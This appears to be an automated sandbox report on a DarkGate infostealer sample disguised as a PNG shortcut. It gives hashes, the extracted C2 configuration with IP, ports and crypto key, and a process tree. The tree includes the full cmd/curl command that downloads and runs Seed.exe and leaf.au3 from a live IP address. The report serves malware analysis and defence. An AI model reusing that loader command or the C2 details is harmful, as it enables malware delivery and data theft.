darkgate | 2888922c2d748ea0498725011645efb6d4f35c858e3a158d58357df12a5e63cc

General

Target

Screenshot_20_11_2023-4839.png.lnk
Size

1KB
MD5

d3d3ffd5ffa81dcdef3cf7e606562d4c
SHA1

dc86ae5e975f08d86052208dbaf182d55e8aedfc
SHA256

3ee01212c840eaee1d11c78169d1deb7f9fa133cbb12f105918328f36afdd971
SHA512

075e69dd2a59ab7da5eb9e03b1753cd6870b2958c3998887e150cd2182aadfbdd90038fc8b88b49a64a9b7896b002057c73b0b7ae952856b43d8159006f6527e

Score

10^/10

darkgate rockyoudragon stealer

Malware Config

Extracted

Family

darkgate

Botnet

rockyoudragon

C2

http://188.246.224.221

Attributes

alternative_c2_port
8080
anti_analysis
false
anti_debug
false
anti_vm
false
c2_port
2351
check_disk
false
check_ram
false
check_xeon
false
crypter_au3
false
crypter_dll
false
crypter_rawstub
true
crypto_key
jHsOoiOBxlimUu
internal_mutex
txtMut
minimum_disk
100
minimum_ram
4096
ping_interval
4
rootkit
true
startup_persistence
true
username
rockyoudragon

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Suspicious use of NtCreateUserProcessOtherParentProcess 15 IoCs

description	pid	Process	procid_target
PID 3104 created 1076	3104	Seed.exe	82
PID 3104 created 3848	3104	Seed.exe	47
PID 3104 created 1076	3104	Seed.exe	82
PID 3104 created 3692	3104	Seed.exe	48
PID 3104 created 1076	3104	Seed.exe	82
PID 3372 created 2316	3372	Seed.exe	78
PID 3372 created 3972	3372	Seed.exe	46
PID 3372 created 2128	3372	Seed.exe	63
PID 3372 created 4068	3372	Seed.exe	72
PID 3372 created 2128	3372	Seed.exe	63
PID 4064 created 3692	4064	Seed.exe	48
PID 4064 created 4068	4064	Seed.exe	72
PID 4064 created 3692	4064	Seed.exe	48
PID 4064 created 2316	4064	Seed.exe	78
PID 4064 created 2400	4064	Seed.exe	76

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 3 IoCs

pid	Process
3104	Seed.exe
3372	Seed.exe
4064	Seed.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Seed.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Seed.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Seed.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Seed.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Seed.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Seed.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1564	PING.EXE

Suspicious behavior: EnumeratesProcesses 48 IoCs

pid	Process
3104	Seed.exe
3104	Seed.exe
3104	Seed.exe
3104	Seed.exe
3104	Seed.exe
3104	Seed.exe
3104	Seed.exe
3104	Seed.exe
3104	Seed.exe
3104	Seed.exe
3104	Seed.exe
3104	Seed.exe
3104	Seed.exe
3104	Seed.exe
3104	Seed.exe
3104	Seed.exe
3372	Seed.exe
3372	Seed.exe
3372	Seed.exe
3372	Seed.exe
3372	Seed.exe
3372	Seed.exe
3372	Seed.exe
3372	Seed.exe
3372	Seed.exe
3372	Seed.exe
3372	Seed.exe
3372	Seed.exe
3372	Seed.exe
3372	Seed.exe
3372	Seed.exe
3372	Seed.exe
4064	Seed.exe
4064	Seed.exe
4064	Seed.exe
4064	Seed.exe
4064	Seed.exe
4064	Seed.exe
4064	Seed.exe
4064	Seed.exe
4064	Seed.exe
4064	Seed.exe
4064	Seed.exe
4064	Seed.exe
4064	Seed.exe
4064	Seed.exe
4064	Seed.exe
4064	Seed.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 1076 wrote to memory of 2984	1076	cmd.exe	85
PID 1076 wrote to memory of 2984	1076	cmd.exe	85
PID 2984 wrote to memory of 1564	2984	cmd.exe	87
PID 2984 wrote to memory of 1564	2984	cmd.exe	87
PID 2984 wrote to memory of 676	2984	cmd.exe	86
PID 2984 wrote to memory of 676	2984	cmd.exe	86
PID 2984 wrote to memory of 4332	2984	cmd.exe	90
PID 2984 wrote to memory of 4332	2984	cmd.exe	90
PID 2984 wrote to memory of 3104	2984	cmd.exe	91
PID 2984 wrote to memory of 3104	2984	cmd.exe	91
PID 2984 wrote to memory of 3104	2984	cmd.exe	91
PID 2984 wrote to memory of 3372	2984	cmd.exe	99
PID 2984 wrote to memory of 3372	2984	cmd.exe	99
PID 2984 wrote to memory of 3372	2984	cmd.exe	99
PID 2984 wrote to memory of 4064	2984	cmd.exe	100
PID 2984 wrote to memory of 4064	2984	cmd.exe	100
PID 2984 wrote to memory of 4064	2984	cmd.exe	100

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3972

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3848

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3692

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
PID:2128

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:4068

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:2400

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2316

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Screenshot_20_11_2023-4839.png.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1076
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c start /min /b ping -n 4 localhost > nul && curl -s -o "C:\Users\Public\Seed.exe" http://45.154.98.21/Seed.exe && curl -s -o "C:\Users\Public\leaf.au3" http://45.154.98.21/leaf.au3 && "C:\Users\Public\Seed.exe" "C:\Users\Public\leaf.au3" && "C:\Users\Public\Seed.exe" "C:\Users\Public\leaf.au3" && "C:\Users\Public\Seed.exe" "C:\Users\Public\leaf.au3"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2984
- - C:\Windows\system32\curl.exe
    curl -s -o "C:\Users\Public\Seed.exe" http://45.154.98.21/Seed.exe
    3⤵
    PID:676
- - C:\Windows\system32\PING.EXE
    ping -n 4 localhost
    3⤵
    - Runs ping.exe
    PID:1564
- - C:\Windows\system32\curl.exe
    curl -s -o "C:\Users\Public\leaf.au3" http://45.154.98.21/leaf.au3
    3⤵
    PID:4332
- - C:\Users\Public\Seed.exe
    "C:\Users\Public\Seed.exe" "C:\Users\Public\leaf.au3"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:3104
- - C:\Users\Public\Seed.exe
    "C:\Users\Public\Seed.exe" "C:\Users\Public\leaf.au3"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:3372
- - C:\Users\Public\Seed.exe
    "C:\Users\Public\Seed.exe" "C:\Users\Public\leaf.au3"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:4064

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

Remote System Discovery

1

T1018

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\hhbcche\hdfheah\fahaaha

Filesize
170B

MD5
8e92f08ed8bcc7d1e86ca186173b5f1c

SHA1
98fd02b18146078bbac48082586031fb011ac48d

SHA256
b9b2e2d47870086c842491db0e1293009a8d4503f609a83dd4a20d77c6e38170

SHA512
807d391fcfc2720d18132d04e855043192b93f000dd017481da1f108b8c2e7d67eeab31489dc90d98935ccc0163986de73bc7051479f74aa4628a443886954f4

Download Submit
C:\ProgramData\hhbcche\hdfheah\fahaaha

Filesize
170B

MD5
8e92f08ed8bcc7d1e86ca186173b5f1c

SHA1
98fd02b18146078bbac48082586031fb011ac48d

SHA256
b9b2e2d47870086c842491db0e1293009a8d4503f609a83dd4a20d77c6e38170

SHA512
807d391fcfc2720d18132d04e855043192b93f000dd017481da1f108b8c2e7d67eeab31489dc90d98935ccc0163986de73bc7051479f74aa4628a443886954f4

Download Submit
C:\Users\Public\Seed.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Public\Seed.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Public\Seed.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Public\leaf.au3

Filesize
491KB

MD5
f2ad2e715487776a73950b7f9aaaff7e

SHA1
e68e7191b17be988f3d520e580362b4d8de39980

SHA256
35f034ecf5f0f3b808eca8a6f6f811e732dcc45bbae67117828bd7e253abbfec

SHA512
31b0b1282f29029a18f1045020eb1cc4c51a03f4fd71011b6314472e905c301b82079b03793dc5cdb5094d0d18132e1a965d13b1d84f84a2bf443c95ab200839

Download Submit
C:\temp\fabddeg.au3

Filesize
491KB

MD5
f2ad2e715487776a73950b7f9aaaff7e

SHA1
e68e7191b17be988f3d520e580362b4d8de39980

SHA256
35f034ecf5f0f3b808eca8a6f6f811e732dcc45bbae67117828bd7e253abbfec

SHA512
31b0b1282f29029a18f1045020eb1cc4c51a03f4fd71011b6314472e905c301b82079b03793dc5cdb5094d0d18132e1a965d13b1d84f84a2bf443c95ab200839

Download Submit
C:\temp\fabddeg.au3

Filesize
491KB

MD5
f2ad2e715487776a73950b7f9aaaff7e

SHA1
e68e7191b17be988f3d520e580362b4d8de39980

SHA256
35f034ecf5f0f3b808eca8a6f6f811e732dcc45bbae67117828bd7e253abbfec

SHA512
31b0b1282f29029a18f1045020eb1cc4c51a03f4fd71011b6314472e905c301b82079b03793dc5cdb5094d0d18132e1a965d13b1d84f84a2bf443c95ab200839

Download Submit
memory/3104-14-0x00000000044C0000-0x0000000004655000-memory.dmp

Filesize
1.6MB

Download
memory/3104-6-0x0000000001270000-0x0000000001670000-memory.dmp

Filesize
4.0MB

Download
memory/3104-13-0x00000000044C0000-0x0000000004655000-memory.dmp

Filesize
1.6MB

Download
memory/3104-12-0x00000000044C0000-0x0000000004655000-memory.dmp

Filesize
1.6MB

Download
memory/3104-7-0x00000000044C0000-0x0000000004655000-memory.dmp

Filesize
1.6MB

Download
memory/3372-28-0x0000000004530000-0x00000000046C5000-memory.dmp

Filesize
1.6MB

Download
memory/3372-30-0x0000000004530000-0x00000000046C5000-memory.dmp

Filesize
1.6MB

Download
memory/3372-27-0x0000000004530000-0x00000000046C5000-memory.dmp

Filesize
1.6MB

Download
memory/3372-21-0x0000000004530000-0x00000000046C5000-memory.dmp

Filesize
1.6MB

Download
memory/3372-20-0x00000000017D0000-0x0000000001BD0000-memory.dmp

Filesize
4.0MB

Download
memory/4064-35-0x0000000001920000-0x0000000001D20000-memory.dmp

Filesize
4.0MB

Download
memory/4064-36-0x0000000004550000-0x00000000046E5000-memory.dmp

Filesize
1.6MB

Download
memory/4064-42-0x0000000004550000-0x00000000046E5000-memory.dmp

Filesize
1.6MB

Download
memory/4064-43-0x0000000004550000-0x00000000046E5000-memory.dmp

Filesize
1.6MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads